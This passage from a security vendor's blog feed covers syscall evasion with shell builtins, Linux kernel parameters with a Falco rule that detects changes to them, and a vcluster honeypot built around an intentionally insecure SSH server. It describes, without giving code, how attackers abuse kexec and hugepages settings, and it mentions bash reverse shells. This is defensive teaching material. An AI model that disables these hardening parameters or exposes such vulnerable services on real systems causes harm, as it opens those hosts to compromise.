Using the bash builtins in a similar fashion to what we did above, there are a number of similar ways we can combine them to replicate functionality of other tools and attacks. A very brief amount of Googling will turn up a well-known method for assembling a reverse shell using the bash builtins. Furthermore, we have all the various shells and all their different sets of builtins at our disposal to tinker with (we’ll leave this as an exercise for the reader). 

In the coming articles in this series, we’ll look at some other methods of syscall evasion. If you want to learn more, explore Defense evasion techniques with Falco.  

The post Exploring Syscall Evasion – Linux Shell Built-ins appeared first on Sysdig.

]]>
Tales from the Kernel Parameter Side https://sysdig.com/blog/kernel-parameters-falco/ Wed, 09 Nov 2022 10:40:22 +0000 https://sysdig.com/?p=59281 Users live in the sunlit world of what they believe to be reality. But, there is, unseen by most, an...

The post Tales from the Kernel Parameter Side appeared first on Sysdig.

]]>

Users live in the sunlit world of what they believe to be reality. But, there is, unseen by most, an underworld. A place that is just as real, but not as brightly lit. The Kernel Parameter side (apologies to George Romero).

Kernel parameters aren’t really that scary in actuality, but they can be a dark and cobweb-filled corner of the Linux world. Kernel parameters are the means by which we can pass parameters to the Linux (or Unix-like) kernel to control how that it behaves. By altering these parameters, we can control the behavior of quite a few different things, including memory, networking, and the filesystem, just to name a few.

There are a LOT of kernel parameters, somewhere in the vicinity of 2,000.

We may find differing parameters in the various flavors of Linux/Unix. Some of them are used or emphasized differently in specific environments, such as those we might find in the various cloud providers. In many cases, the sysctl utility, which we will discuss the use of shortly, is used to view or update these parameters. We may also find them in various parts of the filesystem, depending on the specific OS and distribution that we are working with.

Touring the kernel parameter landscape

We can find the kernel parameters stored in the filesystem as files under /proc/sys/. If we look at the directory structure here, we can see that it is extensive, relatively speaking.

Though the listing below is only two levels of directory structure deep, there are actually more directories under the ones we see here.

├── abi
├── debug
├── dev
│   ├── cdrom
│   ├── hpet
│   ├── mac_hid
│   ├── parport
│   ├── raid
│   ├── scsi
│   └── tty
├── fs
│   ├── binfmt_misc
│   ├── epoll
│   ├── fanotify
│   ├── inotify
│   ├── mqueue
│   ├── quota
│   └── verity
├── kernel
│   ├── firmware_config
│   ├── keys
│   ├── pty
│   ├── random
│   ├── seccomp
│   ├── usermodehelper
│   └── yama
├── net
│   ├── bridge
│   ├── core
│   ├── fan
│   ├── ipv4
│   ├── ipv6
│   ├── mptcp
│   ├── netfilter
│   └── unix
├── user
└── vm

If we look at the top-level structure under /proc/sys/, we can get at least a high level idea of what the different sets of parameters do:

  • abi: parameters for execution domains and personalities
  • debug: debug parameters
  • dev: parameters for devices on the system
  • fs: filesystem parameters
  • kernel: parameters for operation of the kernel
  • net: networking parameters
  • user: user namespace parameters
  • vm: memory management parameters

Each of the directories in this structure will have a set of files (or further directories) under it, one for each parameter, and each of them containing the value that the parameter in question holds. If we look at the structure under /proc/sys/dev/:

├── cdrom
│   ├── autoclose
│   ├── autoeject
│   ├── check_media
│   ├── debug
│   ├── info
│   └── lock
├── hpet
│   └── max-user-freq
├── mac_hid
│   ├── mouse_button2_keycode
│   ├── mouse_button3_keycode
│   └── mouse_button_emulation
├── parport
│   └── default
│       ├── spintime
│       └── timeslice
├── raid
│   ├── speed_limit_max
│   └── speed_limit_min
├── scsi
│   └── logging_level
└── tty
    └── ldisc_autoload

We can see that we have a cdrom directory and, beneath it, a file called autoclose. This is the dev.cdrom.autoclose kernel parameter, which we will be working with shortly.

Some of these parameters are simple binary values, as is the case with dev.cdrom.autoclose. This parameter has a value of either 1 or 0. Some may have a wide range of numeric or even string values. Others, such as dev.cdrom.info, are odd.

CD-ROM information, Id: cdrom.c 3.20 2003/12/17
drive name:		sr1	sr0
drive speed:		1	1
drive # of slots:	1	1
Can close tray:		1	1
Can open tray:		1	1
Can lock tray:		1	1
Can change speed:	1	1
Can select disk:	0	0
Can read multisession:	1	1
Can read MCN:		1	1
Reports media changed:	1	1
Can play audio:		1	1
Can write CD-R:		1	1
Can write CD-RW:	1	1
Can read DVD:		1	1
Can write DVD-R:	1	1
Can write DVD-RAM:	1	1
Can read MRW:		0	0
Can write MRW:		0	0
Can write RAM:		0	0

There is a great deal of information on the internet regarding the various kernel parameters and the impacts of changing them. One excellent resource for chasing down what a particular parameter does is Sysctl Explorer.

Working with kernel parameters

We need these tools with the following minimum versions to work through this demo:

In these examples, we will be using Ubuntu 22.04 Jammy Jellyfish. Working with kernel parameters should generally be the same as the examples below on most distributions that are Debian-based, but may vary in strange and wonderful ways with others.

The easiest of these paths is to use the sysctl utility or add entries in /etc/sysctl.conf. Let’s try a few of these out. We’ll be interacting with the cdrom autoclose parameter as this is relatively innocuous and not even in use on many modern systems.

There are quite a few different methods that we can use to interact with kernel parameters on a live system. As with all things Linux, there is always a “one true” method for any given task. But here, we’ll be covering some of the more common means of doing so.

Viewing kernel parameters

To view a parameter and its value, we can use the sysctl utility to ask for it directly.

Sysctl is a tool specifically made to modify kernel parameters and is available on most flavors of Linux and Unix-like operating systems. In order to modify our parameter directly, we’ll need to know what the name of the parameter is in advance.

$ sudo sysctl dev.cdrom.autoclose
dev.cdrom.autoclose = 1

In the result returned for this, we can see that dev.cdrom.autoclose is set to 1, indicating that it is on and at its default value.

If we don’t immediately know the name of the parameter, we can get a list of all of them and their values with sysctl as well.

$ sudo sysctl -a
abi.vsyscall32 = 1
debug.exception-trace = 1
debug.kprobes-optimization = 1
dev.cdrom.autoclose = 1
<snip>

The parameter we’re working with is conveniently toward the beginning of the list, but there are a couple thousand or so parameters here. We can also, of course, just grep for what we’re looking for if we know roughly what we want.

$ sudo sysctl -a | grep cdrom
dev.cdrom.autoclose = 1
dev.cdrom.autoeject = 0
dev.cdrom.check_media = 0
dev.cdrom.debug = 0
<snip>

We can also look directly in the parameter file in the filesystem. In this case, in the file /proc/sys/dev/cdrom/autoclose.

$ cd /proc/sys/dev/cdrom
$ cat autoclose 
1

Lastly, we can check in /etc/sysctl.conf and see if there is a parameter present here. There may be nothing in the file for our parameter at all, or it may be commented out. Most systems, by default, will not have many parameters in this file and they will all be commented out.

$ cat /etc/sysctl.conf 
#
# /etc/sysctl.conf - Configuration file for setting system variables
# See /etc/sysctl.d/ for additional system variables.
# See sysctl.conf (5) for information.
#
#kernel.domainname = example.com
# Uncomment the following to stop low-level messages on console
#kernel.printk = 3 4 1 3
<snip>

Again, we can simply grep in the file for the parameter that we are looking for to see if it is present at all.

cat /etc/sysctl.conf | grep cdrom

We won’t see a return here in an unmodified system, as this parameter is not in /etc/sysctl.conf by default.

Updating kernel parameters using sysctl

We can easily edit the value of a parameter by using sysctl -w to write our desired value. This change will only persist until the next reboot of the system.

$ sudo sysctl -w dev.cdrom.autoclose=0
dev.cdrom.autoclose = 0

We can double check this change by querying the value again.

$ sudo sysctl dev.cdrom.autoclose
dev.cdrom.autoclose = 0

Updating kernel parameters by editing sysctl.conf

If we want to make a persistent change, we can add our parameter modification to /etc/sysctl.conf, like so.

$ sudo bash -c 'echo "dev.cdrom.autoclose = 1" >> /etc/sysctl.conf'

This is, however, not enough to accomplish the change entirely. If we check the state of the parameter now with sysctl, we will find that it has not changed.

$ sudo sysctl dev.cdrom.autoclose
dev.cdrom.autoclose = 0

Now, we need to load the changes from the files using sysctl -p. If we do not specify a file, sysctl will assume we want to load them from /etc/sysctl.conf, which is what we want. We can then check the parameter again and see the expected change.

$ sudo sysctl -p
$ sudo sysctl dev.cdrom.autoclose
dev.cdrom.autoclose = 1
Note:
There are a few other standard locations that sysctl will look for configuration files in:
/etc/sysctl.d/*.conf
/run/sysctl.d/*.conf
/usr/local/lib/sysctl.d/*.conf
/usr/lib/sysctl.d/*.conf
/lib/sysctl.d/*.conf
We won't get into these here, but the man page for sysctl.d does have extensive info on how these are used.

How to fail at directly editing the files under /proc/sys/

Even though the kernel parameter settings are stored in the individual files under /proc/sys/, we generally won’t be able to edit them directly. We can open them up and view the contents just fine, but if we make a change and try to write it to the file, even as root, we’ll get a variety of error messages, depending on the particular method that we try to take to do so:

  • vi
    "autoclose" E667: Fsync failed
  • nano
    [ Error writing autoclose: Invalid argument ]
  • cat
    bash: autoclose: Permission denied

The items under /proc/ are a part of procfs, which is a virtual filesystem, so even if we were able to make changes here, they wouldn’t persist through a reboot. We can, however, watch these files for changes, which we’ll come back to shortly.

Which kernel parameters should we care about?

One of the harder issues when looking at kernel parameters is sorting out which of them we should care about. There are so many of them and such a wide range of settings that we can change.

How do we know which of these are important and which of them we should panic about when we see unexpected change?

This, as it turns out, is actually a really hard question to answer. To a certain extent, it depends on the specific OS, distribution, version, hardware, etc. that you are using. On the one hand, we might expect to rarely see any kernel parameter change in the environment, and it might be appropriate to ring the alarm bells any time we see one altered. On the other hand, we might have an environment where we see them change frequently. On some of the cloud platforms, kernel parameters are tweaked on instances for things like networking.

If we have our security measures turned up to super paranoid mode, we’re going to get a LOT of alerts – alerts which will soon be blissfully ignored because they are “always just noise,” which is clearly not desirable.

This being said, below is a non-exhaustive list of parameters that are generally considered “important.”

These should all be carefully tested before we randomly go rolling them out in a particular environment for monitoring or make any changes away from the defaults that they are set to. YMMV, IANAD (well..), etc…

dev.tty.ldisc_autoloadDisable loading line disciplines for unprivileged users
fs.protected_fifos

fs.protected_hardlinks

fs.protected_regular

fs.protected_symlinks

fs.suid_dumpable

Disable creating files in insecure areas

Disable creating hardlinks for unprivileged users

Disable creating files in insecure areas

Disable creating symlinks for unprivileged users

Disable core dumps for elevated processes

kernel.core_uses_pid

kernel.ctrl-alt-del

kernel.dmesg_restrict

kernel.kptr_restrict

kernel.modules_disabled

kernel.perf_event_paranoid

kernel.randomize_va_space

kernel.sysrq

kernel.unprivileged_bpf_disabled

kernel.yama.ptrace_scope

Block USB devices

Disable access to dmesg for unprivileged users

Disable kexec to prevent kernel livepatching

Restrict access to kernel logs

Disable loading kernel modules

Restrict use of performance events

Address space randomization

Harden debugging functionality

No BPF for unprivileged users

Limit the scope of ptrace

net.core.bpf_jit_hardenHarden the BPF JIT compiler
net.ipv4.conf.all.accept_redirects

net.ipv4.conf.all.accept_source_route

net.ipv4.conf.all.bootp_relay

net.ipv4.conf.all.forwarding

net.ipv4.conf.all.log_martians

net.ipv4.conf.all.mc_forwarding

net.ipv4.conf.all.proxy_arp

net.ipv4.conf.all.rp_filter

net.ipv4.conf.all.send_redirects

net.ipv4.conf.default.accept_redirects

net.ipv4.conf.default.accept_source_route

net.ipv4.conf.default.log_martians

net.ipv4.icmp_echo_ignore_broadcasts

net.ipv4.icmp_ignore_bogus_error_responses

net.ipv4.tcp_syncookies

net.ipv4.tcp_timestamps

Disable ICMP redirect acceptance

Disable source routing

Disable BOOTP relay

Disable IP forwarding

Disable logging Martian packets

Disable multicast routing

Harden ARP

Source route verification

Disable ICMP redirect sending

Disable ICMP redirect acceptance

Disable source routing

Disable logging Martian packets

Ignore ICMP echo and timestamp requests from broadcasts

Ignore bogus ICMP responses

Enable syncookies

Protect against time-wait assasination

net.ipv6.conf.all.accept_redirects

net.ipv6.conf.all.accept_source_route

net.ipv6.conf.default.accept_redirects

net.ipv6.conf.default.accept_source_route

Protect against IP spoofing

Protect against man-in-the-middle attacks

Protect against IP spoofing

Protect against man-in-the-middle attacks

vm.unprivileged_userfaultfdProtect against use-after-free

There may also be other kernel parameters which, although not immediately sensitive, might be an indication of weirdness if we see them change on a system.

A good example of this is the vm.nr_hugepages parameter. This kernel parameter changes the memory chunk allocation so that memory lookups are faster, which can increase the efficiency of a cryptocurrency miner by 15-30%. Seeing this parameter unexpectedly change on a system may be a very good indicator that someone has gifted us with a miner.

What can the bad guys do with kernel parameters?

In short, quite a lot. Arguably, an attacker would need sufficient permissions on the system to alter the kernel parameters, or an attack that would allow them to subvert another privileged process to do so, but things can get quite a bit worse than this.

In the set of parameters we just discussed, even without digging too deeply, there are several that mitigate a variety of vulnerabilities related to network attacks. Disabling some or all of these intentionally could leave some large holes in the defenses of a system. These really aren’t the ugly parameters for an attacker to play with though.

Tales from the Kernel Parameter side

To pull one out as an example, consider kernel.kexec_load_disabled. Unsetting this parameter can allow a replacement kernel to be loaded at runtime. Not just a replacement kernel, but any kernel, potentially even loading a completely unsigned one. Once we can modify the contents of the kernel at will, we are entirely beyond the reach of any protections that might be in place in the way of anti-malware, or really much of anything else.

Attacks against or using kexec have been a staple of breaking protections on mobile devices and game consoles for years. Pulling off an attack like this might be a bit more complicated than flipping a kernel parameter in the end, but this could give attackers a nice foothold for a starting point.

Tracking changes to kernel parameters

For purposes of changes being made at runtime, there are thankfully few places that we need to watch for changes being made to our systems.

If we want to watch for general changes being made to any parameter, we can monitor the use of the sysctl tool. The two primary uses of this tool that we would care about for this purpose would be the -w switch to write a parameter and the -p switch to load a file such as /etc/sysctl.conf.

Fortunately, whenever changes to kernel parameters are implemented, the individual file pertaining to the parameter being changed under /proc/sys/ is also altered. When we make a change to dev.cdrom.autoclose, the /proc/sys/dev/cdrom/autoclose file is written. This is something we can easily track also, and is a little more sure than tracking any particular mechanism for making changes. We can also be a bit more specific about which parameter changes we want to watch for when we are using this mechanism.

Let’s take a look at using Falco to do just this.

Building a Falco rule to track kernel parameter changes

After installing Falco, we’ll want to make a quick change to the Falco configuration file so we can easily watch the Falco logs. We need to edit /etc/falco/falco.yaml using sudo, and change the file output to true and the filename to /var/log/falco_events.log as shown below:

file_output:
  enabled: true
  keep_alive: false
  filename: /var/log/falco_events.log

Once this is done, we’ll open /etc/falco/falco_rules.local.yaml in an editor using sudo in order to start building our rule.

We will be building a modular rule in order to make it easier to update and modify in the future, and we will implement a list and a macro in addition to the rule. Check out the Falco documentation for more information on these concepts.

First, we will add a list called sensitive_kernel_parameter_files. This list will hold the specific filenames of the parameters we want to monitor. In this case, it’s /proc/sys/cdrom/autoclose.

- list: sensitive_kernel_parameter_files
   items: [/proc/sys/dev/cdrom/autoclose]

Next, we’ll add a macro called sensitive_kernel_parameters. In this, we will place a condition that looks for any file descriptor names that appear in the sensitive_kernel_parameter_names list we just created.

 - macro: sensitive_kernel_parameters
   condition: fd.name in (sensitive_kernel_parameter_files)

Lastly, we’ll create a rule with a condition that looks for modifications to kernel parameters called Kernel Parameter Modification. The fast and easy route for the condition in this rule might look something like the following:

condition: (open_write and (fd.name startswith "/proc/sys/" or fd.name startswith "/etc/sysctl"))

In this case we would watch for writes to any files under /proc/sys/ or /etc/sysctl. This would catch any changes that got made, right? Yes, it would.

Some cloud providers may change kernel parameters on instances in order to optimize them for their particular environment. It may seem like a good idea to set up a rule like “tell me every time any kernel parameter gets changed”, but we may potentially see a great deal of noise from doing so (that’s experience talking).

Instead, let’s make a condition that is a bit more specific. In this case, we’ll watch for files being written, which have a file descriptor name appearing in our sensitive_kernel_parameter_files list.

condition: (open_write and sensitive_kernel_parameters)

The final rule will look like so:

 - rule: Kernel Parameter Modification
   desc: Detect changes to sensitive kernel parameters. May be an indication of compromise.
   condition: (open_write and sensitive_kernel_parameters)
   output: >
     Sensitive kernel parameter was modified; possible unauthorized changes (user.name=%user.name user.loginuid=%user.loginuid proc.cmdline=%proc.cmdline parent=%proc.pname file=%fd.name container.id=%container.id container_name=%container.name evt.type=%evt.type evt.res=%evt.res proc.pid=%proc.pid proc.cwd=%proc.cwd proc.ppid=%proc.ppid proc.pcmdline=%proc.pcmdline proc.sid=%proc.sid proc.exepath=%proc.exepath user.uid=%user.uid user.loginname=%user.loginname group.gid=%group.gid group.name=%group.name image=%container.image.repository:%container.image.tag)
 priority: WARNING

Finally, we need to restart the Falco service to put our updated rule into service.

sudo service falco restart

Testing our Falco rule

Let’s take everything for a test drive. We will want to use at least two terminals for this so we can easily keep track of everything that is going on.

First, we’ll set up a tail to follow anything that happens in the Falco log file. There will probably be some content here already from the Falco service ticking over, but we want to watch for new events being added.

In terminal 1:

tail -f /var/log/falco_events.log

Let’s first check the current state of the parameter. If we have followed all the steps above, dev.cdrom.autoclose is probably set to 1, but let’s take a peek anyway.

In terminal 2:

$ sudo sysctl dev.cdrom.autoclose
dev.cdrom.autoclose = 1

If it’s set to 0, that’s OK too. We can just reverse the sense of the command below if that’s the case. Let’s make the change:

$ sudo sysctl -w dev.cdrom.autoclose=0
dev.cdrom.autoclose = 0

In our tail of the Falco log in terminal 1, we should see the output of our kernel parameter change rule. Success!

11:19:22.673413934: Warning Kernel parameter was modified; possible unauthorized changes (user.name=root user.loginuid=1000 proc.cmdline=sysctl -w dev.cdrom.autoclose=0 parent=sudo file=/proc/sys/dev/cdrom/autoclose container.id=host container_name=host evt.type=openat evt.res=SUCCESS proc.pid=1447007 proc.cwd=/proc/sys/dev/cdrom/ proc.ppid=1447006 proc.pcmdline=sudo sysctl -w dev.cdrom.autoclose=0 proc.sid=5067 proc.exepath=/usr/sbin/sysctl user.uid=0 user.loginname=user group.gid=8390047166231478272 group.name=root image=<NA>:<NA>)

To expand what we have done here, we can go back and easily add whichever parameters we want to watch for modification to the sensitive_kernel_parameter_files list. We just need to know where in the filesystem the parameter lives in order to add it to the list.

Conclusion

Kernel parameters can be a bit scary at first glance, but are less intimidating than they appear to be once we get a bit better understanding of how they are structured and how they function. Once we have an idea of what the different sections of the directory structure under /proc/sys/ do, it becomes considerably easier to track down parameters and understand their purpose.

Armed with knowledge about what these parameters are and how we can interact with them, we can work on putting them to use in strengthening the security of our systems. As soon as we understand what the points are for monitoring kernel parameter changes, we can also help to protect ourselves from the impact of unexpected changes.

Falco could alert us about the modification of specific core parameters, avoiding the massive noise that this process causes.


If you would like to find out more about Falco:

The post Tales from the Kernel Parameter Side appeared first on Sysdig.

]]>
Building honeypots with vcluster and Falco: Episode I https://sysdig.com/blog/how-to-honeypot-vcluster-falco/ Tue, 04 Oct 2022 15:00:53 +0000 https://sysdig.com/?p=54856 Honeypots are, at a high level, mechanisms for luring attackers in order to distract them from legitimate access or to...

The post Building honeypots with vcluster and Falco: Episode I appeared first on Sysdig.

]]>
Honeypots are, at a high level, mechanisms for luring attackers in order to distract them from legitimate access or to gather intelligence on their activities. We’re going to build a small example here of a honeypot using vcluster and Falco.

In this first episode, we explain how to build a simple SSH honeypot using vcluster and Falco for runtime intrusion detection.

Why honeypots?

Honeypots can be modeled on almost any type of digital asset, including applications, systems, networks, IoT devices, SCADA components, and a wide range of others. They can range in complexity, from honeytokens representing instrumented single files to honeynets representing sprawling networks of multiple systems and infrastructure.

kubernetes honeypot vcluster Falco

Therefore, honeypots are of great utility for intelligence collection, as they can allow blue teams and security researchers a window into the tools, techniques, and procedures (TTPs) of attackers, as well as provide information as the basis for Indicators of Compromise (IoCs) to feed to various security tools.

One of the ways we can classify honeypots is by their level of complexity; high interaction and low interaction.

High interaction vs. Low interaction honeypots

Low interaction honeypots are the duck decoy of the honeypot world. They don’t take a lot of resources to run, but they generally don’t stand up to close examination. They may do something simple like respond with a relatively realistic banner message on a standard port, but this is usually about the extent of what they can do. This may briefly interest an attacker when showing up on a port and service scan, but the lack of response otherwise likely won’t keep them interested for long. Additionally, low interaction honeypots don’t give us much of a view into what the attacker is doing, as they don’t provide a great deal of an attack surface for them to actually interact with.

If low interaction honeypots are a duck decoy, then high interaction honeypots are actual ducks. While this is much better for luring attackers in, we might lose our duck. High interaction honeypots are often composed of real systems running real applications, and are instrumented to keep close track of what an attacker is doing. This can allow us to see the full length of more complex activities, such as chained exploits, as well as obtain copies of tools and binaries uploaded, credentials used, etc. While these are great from an intelligence gathering perspective, we have also just put an actual asset directly in the hands of an attacker and need to carefully monitor what they are doing with it.

One of the primary challenges with high interaction honeypots is in keeping the attacker isolated from the rest of the environment. In the case of honeypots built using containerization tools such as Kubernetes, we have to carefully keep the attacker away from the portions of the cluster actually running the honeypot and the associated instrumentation for monitoring and maintaining it. This can be challenging and can also force us to limit what we can expose for attackers to access. Anything an attacker could use to target the cluster itself or the instrumentation would need to be excluded, or workarounds would have to be put in place to prevent unwanted tampering from happening.

Virtual clusters to the rescue

Virtual clusters are Kubernetes clusters running on top of the host Kubernetes cluster. We can run multiple virtual clusters, each in its own separate environment and unable to reach the other virtual clusters or the host cluster.

Since the virtual cluster is running inside of its own isolated space, this allows us to expose very sensitive items inside them, as attackers aren’t seeing the “real” equivalents running on the host cluster. In this way, we can expose elements of the Kubernetes infrastructure, maintenance tools, and other such items without having to worry about attackers taking down the honeypot itself.

vcluster architecture
What is a vcluster – Architecture

There are several virtual cluster projects we could use for this, but vcluster is currently the most polished and well-supported. The vcluster folks are very friendly and helpful, be sure to stop in and say hi to them on their Slack!

Let’s build a vcluster honeypot

We’re going to build a small example of a honeypot using vlcuster. This is an intentionally simple example but will provide us with a good foundation to build on for any future tinkering we might want to do.

We need tools with the following minimum versions to achieve this demo:

  • Minikube v1.26.1
  • Helm v3.9.2
  • kubectl v1.25.0
  • vcluster 0.11.2

Step-by-step installation of a vcluster honeypot and Falco

First, we’ll install the vcluster binary, a very simple task.

p$ curl -s -L "https://github.com/loft-sh/vcluster/releases/latest" | sed -nE 's!.*"([^"]*vcluster-linux-amd64)".*!https://github.com\1!p' | xargs -n 1 curl -L -o vcluster && chmod +x vcluster;
1 curl -L -o vcluster && chmod +x vcluster;
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
100 36.8M  100 36.8M    0     0  10.4M      0  0:00:03  0:00:03 --:--:-- 11.2M
$ sudo mv vcluster /usr/local/bin;
$ vcluster version
vcluster version 0.11.2

Provision a local Kubernetes cluster

There are a wide variety of ways to provision a Kubernetes cluster. In this particular example, we will be using minikube.

Note: For our purposes here, we can use the virtualbox, qemu, or kvm2 driver for minikube, but not the none driver. Falco will fail to deploy its driver correctly later on if we try to use none. Additionally, since we’re using the virtualbox driver, we need to deploy this on actual hardware. This will not work inside of a VM, on an EC2 instance, etc.

Let’s provision a cluster. After we run the start command, minikube will run for a minute or two while it builds everything for us.

$ minikube start --vm-driver=virtualbox
😄  minikube v1.26.1 on Ubuntu 22.04
✨  Using the virtualbox driver based on user configuration
👍  Starting control plane node minikube in cluster minikube
🔥  Creating virtualbox VM (CPUs=2, Memory=6000MB, Disk=20000MB) ...
🐳  Preparing Kubernetes v1.24.3 on Docker 20.10.17 ...
    ▪ Generating certificates and keys ...
    ▪ Booting up control plane ...
    ▪ Configuring RBAC rules ...
    ▪ Using image gcr.io/k8s-minikube/storage-provisioner:v5
🔎  Verifying Kubernetes components...
🌟  Enabled addons: storage-provisioner
🏄  Done! kubectl is now configured to use "minikube" cluster and "default" namespace by default

Instrumenting our honeypot with Falco

Next, we need to install Falco:

$ helm repo add falcosecurity https://falcosecurity.github.io/charts
"falcosecurity" has been added to your repositories
$ helm repo update
Hang tight while we grab the latest from your chart repositories...
...Successfully got an update from the "falcosecurity" chart repository
Update Complete. ⎈Happy Helming!⎈
$ helm upgrade --install falco --set driver.loader.initContainer.image.tag=master --set driver.loader.initContainer.env.DRIVER_VERSION="2.0.0+driver" --set tty=true --namespace falco --create-namespace falcosecurity/falco
Release "falco" does not exist. Installing it now.
NAME: falco
LAST DEPLOYED: Thu Sep  8 15:32:45 2022
NAMESPACE: falco
STATUS: deployed
REVISION: 1
TEST SUITE: None
NOTES:
Falco agents are spinning up on each node in your cluster. After a few
seconds, they are going to start monitoring your containers looking for
security issues.
No further action should be required.
Tip: 
You can easily forward Falco events to Slack, Kafka, AWS Lambda and more with falcosidekick. 
Full list of outputs: https://github.com/falcosecurity/charts/tree/master/falcosidekick.
You can enable its deployment with `--set falcosidekick.enabled=true` or in your values.yaml. 
See: https://github.com/falcosecurity/charts/blob/master/falcosidekick/values.yaml for configuration values.

The falco pod will take a minute or so to spin up. We can use kubectl to check the status of it and have a look at the logs to make sure everything went smoothly:

$ kubectl get pods -n falco -o wide
NAME          READY   STATUS    RESTARTS   AGE   IP           NODE       NOMINATED NODE   READINESS GATES
falco-zwfcj   1/1     Running   0          73s   172.17.0.3   minikube   <none>           <none>
$ kubectl logs falco-zwfcj -n falco
Defaulted container "falco" out of: falco, falco-driver-loader (init)
Thu Sep  8 22:32:47 2022: Falco version 0.32.2
Thu Sep  8 22:32:47 2022: Falco initialized with configuration file /etc/falco/falco.yaml
Thu Sep  8 22:32:47 2022: Loading rules from file /etc/falco/falco_rules.yaml:
Thu Sep  8 22:32:47 2022: Loading rules from file /etc/falco/falco_rules.local.yaml:
Thu Sep  8 22:32:48 2022: Starting internal webserver, listening on port 8765

Putting everything together to create the virtual cluster

Next, we need to create a namespace in the host cluster for our vcluster to live in, then deploy the vcluster into it.

$ kubectl create namespace vcluster
namespace/vcluster created
$ vcluster create ssh -n vcluster
info   Detected local kubernetes cluster minikube. Will deploy vcluster with a NodePort & sync real nodes
info   Create vcluster ssh...
info   execute command: helm upgrade ssh https://charts.loft.sh/charts/vcluster-0.11.2.tgz --kubeconfig /tmp/3673995455 --namespace vcluster --install --repository-config='' --values /tmp/641812157
done √ Successfully created virtual cluster ssh in namespace vcluster
info   Waiting for vcluster to come up...
warn   vcluster is waiting, because vcluster pod ssh-0 has status: ContainerCreating
done √ Switched active kube context to vcluster_ssh_vcluster_minikube
- Use `vcluster disconnect` to return to your previous kube context
- Use `kubectl get namespaces` to access the vcluster

Install the SSH honeypot target

With the vcluster instantiated, we can now create an intentionally insecure ssh server inside of it to use as a target for our honeypot, this is something we mentioned earlier in securing SSH on EC2.

We’ll be deploying an intentionally insecure ssh server helm chart from sourcecodebox.io to use as a target here. The credentials for this server are root/THEPASSWORDYOUCREATED.

$ helm repo add securecodebox https://charts.securecodebox.io/
"securecodebox" has been added to your repositories
$ helm repo update
Hang tight while we grab the latest from your chart repositories...
...Successfully got an update from the "falcosecurity" chart repository
...Successfully got an update from the "securecodebox" chart repository
Update Complete. ⎈Happy Helming!⎈
$ helm install my-dummy-ssh securecodebox/dummy-ssh --version 3.14.3
NAME: my-dummy-ssh
LAST DEPLOYED: Thu Sep  8 15:53:15 2022
NAMESPACE: default
STATUS: deployed
REVISION: 1
TEST SUITE: None
NOTES:
Demo SSH Server deployed.
Note this should used for demo and test purposes.
Do not expose this to the Internet!

Examine the different contexts

Now we have something running inside our vcluster. Let’s take a look at the two different contexts we have.

Note:
A context in Kubernetes is a set of parameters defining how to access a particular cluster. Switching the context will change everything we do with commands like kubectl from one cluster to another.

First, let’s look at all of the resources existing in our cluster by using the current vcluster perspective.

$ kubectl get all --all-namespaces
NAMESPACE     NAME                                READY   STATUS    RESTARTS   AGE
kube-system   pod/coredns-6ffcc6b58-h7zwx        1/1     Running   0          m26s
default       pod/my-dummy-ssh-f98c68f95-vwns   1/1     Running   0          m1s
NAMESPACE     NAME                   TYPE        CLUSTER-IP      EXTERNAL-IP   PORT(S)                  AGE
default       service/kubernetes     ClusterIP   10.96.112.178   <none>        443/TCP                  m26s
kube-system   service/kube-dns       ClusterIP   10.97.196.120   <none>        53/UDP,53/TCP,9153/TCP   m26s
default       service/my-dummy-ssh   ClusterIP   10.99.109.0     <none>        22/TCP                   m1s
NAMESPACE     NAME                           READY   UP-TO-DATE   AVAILABLE   AGE
kube-system   deployment.apps/coredns        1/1     1            1           m26s
default       deployment.apps/my-dummy-ssh   1/1     1            1           m1s
NAMESPACE     NAME                                      DESIRED   CURRENT   READY   AGE
kube-system   replicaset.apps/coredns-6ffcc6b58        1         1         1       m26s
default       replicaset.apps/my-dummy-ssh-f98c68f95   1         1         1       m1s

We can see the normal infrastructure for Kubernetes, as well as the pod and service for my-dummy-ssh running in the default namespace. Note that we do not see the resources for Falco, as this is installed in our host cluster and isn’t visible from within the vcluster.

Next, let’s switch contexts by disconnecting from vcluster. This will take us back to the context of the host cluster.

$ vcluster disconnect
info   Successfully disconnected from vcluster: ssh and switched back to the original context: minikube

We can now ask kubectl to show us all of the resources again, as we will see a very different picture.

$ kubectl get all --all-namespaces
NAMESPACE     NAME                                                READY   STATUS    RESTARTS   AGE
falco         pod/falco-zwfcj                                     1/1     Running   0          5m
kube-system   pod/coredns-d4b75cb6d-ttwdl                        1/1     Running   0          4m
kube-system   pod/etcd-minikube                                   1/1     Running   0          4m
kube-system   pod/kube-apiserver-minikube                         1/1     Running   0          4m
kube-system   pod/kube-controller-manager-minikube                1/1     Running   0          4m
kube-system   pod/kube-proxy-dhg9v                                1/1     Running   0          4m
kube-system   pod/kube-scheduler-minikube                         1/1     Running   0          4m
kube-system   pod/storage-provisioner                             1/1     Running   0          4m
vcluster      pod/coredns-6ffcc6b58-h7zwx-x-kube-system-x-ssh    1/1     Running   0          1m
vcluster      pod/my-dummy-ssh-f98c68f95-vwns-x-default-x-ssh   1/1     Running   0          5m
vcluster      pod/ssh-0                                           2/2     Running   0          1m
NAMESPACE     NAME                                   TYPE        CLUSTER-IP      EXTERNAL-IP   PORT(S)                  AGE
default       service/kubernetes                     ClusterIP   10.96.0.1       <none>        443/TCP                  4m
kube-system   service/kube-dns                       ClusterIP   10.96.0.10      <none>        53/UDP,53/TCP,9153/TCP   4m
vcluster      service/kube-dns-x-kube-system-x-ssh   ClusterIP   10.97.196.120   <none>        53/UDP,53/TCP,9153/TCP   1m
vcluster      service/my-dummy-ssh-x-default-x-ssh   ClusterIP   10.99.109.0     <none>        22/TCP                   5m
vcluster      service/ssh                            NodePort    10.96.112.178   <none>        443:31530/TCP            1m
vcluster      service/ssh-headless                   ClusterIP   None            <none>        443/TCP                  1m
vcluster      service/ssh-node-minikube              ClusterIP   10.102.36.118   <none>        10250/TCP                1m
NAMESPACE     NAME                        DESIRED   CURRENT   READY   UP-TO-DATE   AVAILABLE   NODE SELECTOR            AGE
falco         daemonset.apps/falco        1         1         1       1            1           <none>                   5m
kube-system   daemonset.apps/kube-proxy   1         1         1       1            1           kubernetes.io/os=linux   4m
NAMESPACE     NAME                      READY   UP-TO-DATE   AVAILABLE   AGE
kube-system   deployment.apps/coredns   1/1     1            1           4m
NAMESPACE     NAME                                 DESIRED   CURRENT   READY   AGE
